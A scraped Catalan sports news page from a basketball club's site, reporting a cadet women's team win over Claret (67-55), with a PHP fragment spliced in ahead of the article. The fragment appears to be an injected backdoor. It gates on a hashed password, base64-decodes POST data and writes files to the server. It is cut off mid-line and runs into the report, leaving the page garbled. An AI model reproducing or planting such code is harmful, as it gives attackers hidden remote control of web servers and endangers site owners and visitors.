function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" La intensitat defensiva i el contraatac del cadet femení 1 tomben el Claret (67-55) - Tgn Bàsquet Club -

La intensitat defensiva i el contraatac del cadet femení 1 tomben el Claret (67-55)

Updated: febrer 16, 2016

El cadet femení 1 va saber jugar amb intel·ligència i aprofitar les seves virtuts contra un rival, el Claret, superior físicament. Així, el tècnic Laureà Català va decidir fer una defensa molt intensa per tal d’allunyar les altes jugadores visitants del cèrcol. Ho va aconseguir en un molt bon primer període on les locals van córrer molt bé el contraatac i es van aprofitar de la inspiració de Burgueño (13 punts en aquest període dels 24 que va fer).

Amb tot, el Claret va capgirar la situació. La defensa local va afluixar en el segon període i els contraatacs van desaparèixer. En el cinc contra cinc davant un rival més fort físicament, el TGN Bàsquet només va poder anotar 5 punts. Les visitants van remuntar (35-37, minut 24) però aleshores la velocitat local va tornar a aparèixer i va revolucionar el partit, recuperant el joc dels primers deu minuts. Així, el màxim avantatge va ser de 17 punts (61-44, minut 33).